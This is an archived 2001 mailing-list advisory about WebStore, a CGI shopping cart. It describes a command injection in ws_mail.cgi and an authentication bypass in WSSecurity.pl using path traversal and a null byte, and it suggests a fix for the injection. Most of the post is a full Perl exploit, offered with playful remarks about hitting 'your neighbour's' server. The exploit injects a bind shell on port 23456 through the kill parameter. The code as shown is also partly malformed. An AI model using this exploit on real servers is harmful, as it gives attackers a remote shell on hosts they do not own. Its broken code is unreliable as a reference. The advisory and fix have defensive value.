
From: Deja User (noident@my-deja.com)
Date: Tue Jun 12 2001 - 09:31:09 PDT

  • Next message: bugzillaat_private: "[RHSA-2001:077-05] LPRng fails to drop supplemental group membership"

     ('binary' encoding is not supported, stored as-is)
    I'm reposting a bug I've found some time before.
    WebStore from www.cgicentral.net is a shopping cart allowing users to buy things on-line.
    One of the scripts in the package, ws_mail.cgi unsafely passes user-submitted data to
    'system' command:
    if ($in{'terminate'}) {
            eval { system("kill $in{'kill'}") } if defined($in{'kill'});
    This command can only be issued by an authenticated administrator.
    Another script in the package, Library/WSSecurity.pl allows us to bypass verification:
    in sub verify_user:
    if ($filename) {
                    $file = $user_directory.'/'.$filename.'.usr';
                    open(FILE, $file) || &logon_html('Access Error');
                    while (<FILE>) { @fields = split(/\|/) }
                    if (-M $file > .02) {
                            print FILE join ('|', @fields);
                            system("chmod 666 $file");
                    $fullname  = "\L\u$fields[2] "."\L\u$fields[3]";
                    return ($filename, $fullname, $fields[1]);
    Variable $filename is passed by the user, and we can specify any file that we think
    exists on the system that is readable and writeable by us, with or without path
    traversal (the ../../ stuff) and get rid of the '.usr' bit by whacking a nul at the end
    of $filename. This allows us to authenticate enough to issue the kill command.
    The authors were contacted a week ago, I received no reply from them.
    Suggested workaround:
    One way to fix the unsafe system command is to substitute all instances of
    system("kill $in{'kill'}" for
    system("kill", "$in{'kill'}")
    system in a list context is safe to use.
    The vulnerability was found, exploit written and workaround suggested by:
    Igor Dobrovitski noident@my-deja.com
    #!/usr/bin/perl -w
    # Sun, May 6, 2001
    # exploit by Igor Dobrovitski, noident@my-deja.com
    # The exploit is for the default set-up. A good way to test if your (your neighbour's :) server
    # is vulnerable. Only for Unix, will now work on NT
    # Enjoy
    use Socket;
    $| = 1;
    $msgfile = '../../Statistics/WebStore_Access.counter';
    $userfile = '../Statistics/WebStore_Access.counter';
    # if the sploit doesn't work with the above values, comment them out and uncomment ones below
    #$msgfile = '../../ws_delete_files.cron';
    #$userfile = '../ws_delete_files.cron';
    # or these if the above fails:
    #$msgfile = '../../Statistics/index.html';
    #$userfile = '../Statistics/index.html';
    $exec_code = 'use Socket;$protocol = getprotobyname(tcp);socket(SOCK, PF_INET, SOCK_STREAM, $protocol)
    ;setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, 1);$port=23456;bind(SOCK, sockaddr_in($port, INADDR_ANY));
    listen(SOCK, 1);accept (NEW, SOCK);if(!fork()){open STDIN, "<&NEW"; open STDOUT, ">&NEW";open STDERR, 
    ">&NEW";exec "/bin/sh -i"}else{close NEW;exit;}';
    unless(defined $ARGV[0]) {die "Usage: $0 www.example.com/cgi-bin/ws_mail.cgi\n"}
    $ARGV[0] =~ s|^(?:http://)*(.*/).*(\..*)$|${1}ws_mail$2|;
    ($host, $scriptpath) = $ARGV[0] =~ m|^(.*?)(/.*)$|;
    $userfile .= '\0';
    $sh_cmd = '55555;perl=\'perl\';test -x /usr/bin/perl && perl=\'/usr/bin/perl\';test -x /usr/local/bin/
    perl && perl=\'/usr/local/bin/perl\';$perl -e \'' . $exec_code . '\'';
    # the above is what's passed to the 'system' command as part of an argument
    $form = makeform({'userfile' => $userfile, 'kill' => $sh_cmd, 'terminate' => 'whatever',
                      'admin' => 'yep', 'restart' => 'pls', 'msgfile' => $msgfile});
    print "Engaging the enemy. Please stand by...\n";
    $SIG{ALRM} = sub { print STDERR "Timeout was expected. The shell awaits you on port 23456\nHave fun an
    d be nice to the server.\n"; exit };
    sub makeform
        my $string;
        my @blah;
        my $line  = '';
        my $here;
        my %data = %{$_[0]};
        foreach my $key (keys %data)
            $line .= "$key" . 'AAAA' . "$data{$key}" . 'BBBB';
        $line =~ s|^(.*)BBBB$|$1|;
        $line =~ s/\\n/\n/g;
        $line =~ s/\\t/\t/g;
        $line =~ s/\\e/\e/g;
        $line =~ s/\\f/\f/g;
        $line =~ s/\\r/\r/g;
        $line =~ s/\\0/\0/g;
        foreach my $char (split //, $line)
            if($char !~ m/[A-Za-z0-9._ ]/)
                $char = unpack "H2", $char;
                $char = '%' . "$char";
            push @blah, $char;
        $string = join "",@blah;
        $string =~ s/AAAA/=/g;
        $string =~ s/BBBB/&/g;
        $string =~ s/ /+/g;
        my $cont_len = length($string);
    $here = <<EOF;
    POST $scriptpath HTTP/1.0
    User-Agent: Mozilla (Windows 98)
    Host: $host
    referer: $host
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
    Accept-Encoding: gzip
    Accept-Language: en
    Accept-Charset: iso-8859-1,*,utf-8
    Content-type: application/x-www-form-urlencoded
    Content-length: $cont_len
        return $here;
    sub send
        my $form_to_send = shift;
        my $h = inet_aton($host) or die "Forward lookup for $host failed\n";
        socket(S,PF_INET,SOCK_STREAM,6) or die "socket prolems\n";
        unless(connect(S,sockaddr_in(80,$h))) {print STDERR "Couldn't connect to " . inet_ntoa($h) . "\n"
    ; close(S); exit 1 }
        print "$form_to_send";
        my @reply=<S>;
        return @reply;
    sub oops_the_sploit_did_not_work
        print STDERR "The exploit didn't work on this host\nSorry...\n";
    --== Sent via Deja.com ==--

    This archive was generated by hypermail 2b30 : Tue Jun 12 2001 - 18:59:50 PDT